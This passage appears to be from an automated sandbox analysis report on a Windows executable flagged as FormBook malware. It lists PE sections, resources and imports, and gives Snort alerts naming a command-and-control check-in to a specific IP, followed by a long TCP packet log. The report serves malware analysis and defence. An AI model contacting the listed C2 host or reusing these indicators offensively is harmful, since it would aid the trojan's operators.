add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x67000	0x2676	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x73000	0x40600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6c000	0x6570	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x6b000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x67760	0x5f8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ed50	0x5ee00	False	0.533486186594	data	6.56814798318	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0x60000	0xc08	0xe00	False	0.53515625	data	5.68696230909	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x61000	0x1f4c	0x2000	False	0.402465820312	data	3.88111147395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x63000	0x37a4	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x67000	0x2676	0x2800	False	0.31298828125	data	5.07577903587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x6a000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x6b000	0x18	0x200	False	0.05078125	data	0.20448815744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6c000	0x6570	0x6600	False	0.642080269608	data	6.68603494627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x73000	0x40600	0x40600	False	0.313121966019	data	5.92007118283	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x74224	0x134	data	English	United States
RT_CURSOR	0x74358	0x134	data	English	United States
RT_CURSOR	0x7448c	0x134	data	English	United States
RT_CURSOR	0x745c0	0x134	data	English	United States
RT_CURSOR	0x746f4	0x134	data	English	United States
RT_CURSOR	0x74828	0x134	data	English	United States
RT_CURSOR	0x7495c	0x134	data	English	United States
RT_BITMAP	0x74a90	0x1d0	data	English	United States
RT_BITMAP	0x74c60	0x1e4	data	English	United States
RT_BITMAP	0x74e44	0x1d0	data	English	United States
RT_BITMAP	0x75014	0x1d0	data	English	United States
RT_BITMAP	0x751e4	0x1d0	data	English	United States
RT_BITMAP	0x753b4	0x1d0	data	English	United States
RT_BITMAP	0x75584	0x1d0	data	English	United States
RT_BITMAP	0x75754	0x1d0	data	English	United States
RT_BITMAP	0x75924	0x1d0	data	English	United States
RT_BITMAP	0x75af4	0x1d0	data	English	United States
RT_BITMAP	0x75cc4	0x128	data	English	United States
RT_BITMAP	0x75dec	0x128	data	English	United States
RT_BITMAP	0x75f14	0x128	data	English	United States
RT_BITMAP	0x7603c	0xe8	data	English	United States
RT_BITMAP	0x76124	0x128	data	English	United States
RT_BITMAP	0x7624c	0x128	data	English	United States
RT_BITMAP	0x76374	0xd0	data	English	United States
RT_BITMAP	0x76444	0x128	data	English	United States
RT_BITMAP	0x7656c	0x128	data	English	United States
RT_BITMAP	0x76694	0x128	data	English	United States
RT_BITMAP	0x767bc	0x128	data	English	United States
RT_BITMAP	0x768e4	0x128	data	English	United States
RT_BITMAP	0x76a0c	0xe8	data	English	United States
RT_BITMAP	0x76af4	0x128	data	English	United States
RT_BITMAP	0x76c1c	0x128	data	English	United States
RT_BITMAP	0x76d44	0xd0	data	English	United States
RT_BITMAP	0x76e14	0x128	data	English	United States
RT_BITMAP	0x76f3c	0x128	data	English	United States
RT_BITMAP	0x77064	0x128	data	English	United States
RT_BITMAP	0x7718c	0x128	data	English	United States
RT_BITMAP	0x772b4	0x128	data	English	United States
RT_BITMAP	0x773dc	0xe8	data	English	United States
RT_BITMAP	0x774c4	0x128	data	English	United States
RT_BITMAP	0x775ec	0x128	data	English	United States
RT_BITMAP	0x77714	0xd0	data	English	United States
RT_BITMAP	0x777e4	0x128	data	English	United States
RT_BITMAP	0x7790c	0x128	data	English	United States
RT_BITMAP	0x77a34	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x77b1c	0x10a8	data	English	United States
RT_ICON	0x78bc4	0x25a8	data	English	United States
RT_DIALOG	0x7b16c	0x52	data
RT_DIALOG	0x7b1c0	0x52	data
RT_STRING	0x7b214	0xec	data
RT_STRING	0x7b300	0x304	data
RT_STRING	0x7b604	0x164	data
RT_STRING	0x7b768	0xc8	data
RT_STRING	0x7b830	0x134	data
RT_STRING	0x7b964	0x478	data
RT_STRING	0x7bddc	0x374	data
RT_STRING	0x7c150	0x370	data
RT_STRING	0x7c4c0	0x3c8	data
RT_STRING	0x7c888	0xd4	data
RT_STRING	0x7c95c	0xa4	data
RT_STRING	0x7ca00	0x2a0	data
RT_STRING	0x7cca0	0x458	data
RT_STRING	0x7d0f8	0x38c	data
RT_STRING	0x7d484	0x2b4	data
RT_RCDATA	0x7d738	0x10	data
RT_RCDATA	0x7d748	0x344	data
RT_RCDATA	0x7da8c	0x35986	PC bitmap, Windows 3.x format, 611 x 165 x 8	English	United States
RT_GROUP_CURSOR	0xb3414	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb3428	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb343c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb3450	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb3464	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb3478	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xb348c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xb34a0	0x22	data	English	United States

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
advapi32	AuditFree
uRL	InetIsOffline

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-16:26:27.398004	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.3	156.235.157.134
12/01/21-16:26:27.398004	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.3	156.235.157.134
12/01/21-16:26:27.398004	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.3	156.235.157.134
12/01/21-16:26:55.888065	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49847	15.197.142.173	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 16:22:55.842916012 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:55.842961073 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:55.843127966 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:55.858968019 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:55.858999014 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:55.911139965 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:55.911391973 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.174351931 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.174402952 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.174685001 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.174763918 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.177685022 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223340988 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223452091 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223496914 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223541975 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223576069 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223604918 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223614931 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223638058 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223668098 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223686934 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223695040 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223701000 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223750114 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223786116 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223788023 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223798990 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223824024 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223841906 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.223846912 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223880053 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223907948 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223937988 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.223978043 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224020958 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224054098 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224086046 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224113941 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224121094 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224133015 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224159956 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224178076 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224180937 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224191904 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224246025 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224277020 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224312067 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224344969 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224369049 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224384069 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224401951 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224417925 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224423885 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224428892 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224458933 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224483967 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224487066 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224493980 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224525928 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224540949 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224555016 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224560976 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224586964 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224591970 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224618912 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224625111 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224653006 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224657059 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224683046 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224688053 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224714994 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224720955 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224745989 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224750996 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224762917 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.224783897 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224822044 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.224827051 CET	443	49750	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.225027084 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.230272055 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.230338097 CET	49750	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.252341032 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.252384901 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.252484083 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.259957075 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.259984016 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.301635981 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.301779032 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.304454088 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.304467916 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.309356928 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.309386015 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.365770102 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.365859985 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.365878105 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.365909100 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.365945101 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.365951061 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.365973949 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.365992069 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.365995884 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366036892 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366038084 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366055012 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366081953 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366101980 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366142035 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366185904 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366204977 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366261959 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366262913 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366276026 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366329908 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366336107 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366381884 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366385937 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366400003 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366414070 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366426945 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366450071 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366466045 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366470098 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366478920 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366508961 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366524935 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366537094 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366543055 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366569996 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366580009 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366590023 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366600990 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366632938 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366633892 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366647005 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366651058 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366677999 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366695881 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366700888 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366744995 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366745949 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366758108 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366807938 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366813898 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366846085 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366851091 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366858006 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366885900 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366887093 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366898060 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366930962 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366950035 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.366954088 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.366995096 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367000103 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367043972 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367048979 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367084026 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367094040 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367101908 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367130041 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367151976 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367156982 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367196083 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367201090 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367216110 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367243052 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367265940 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367269993 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367310047 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367316008 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367327929 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367355108 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367378950 CET	49751	443	192.168.2.3	162.159.129.233
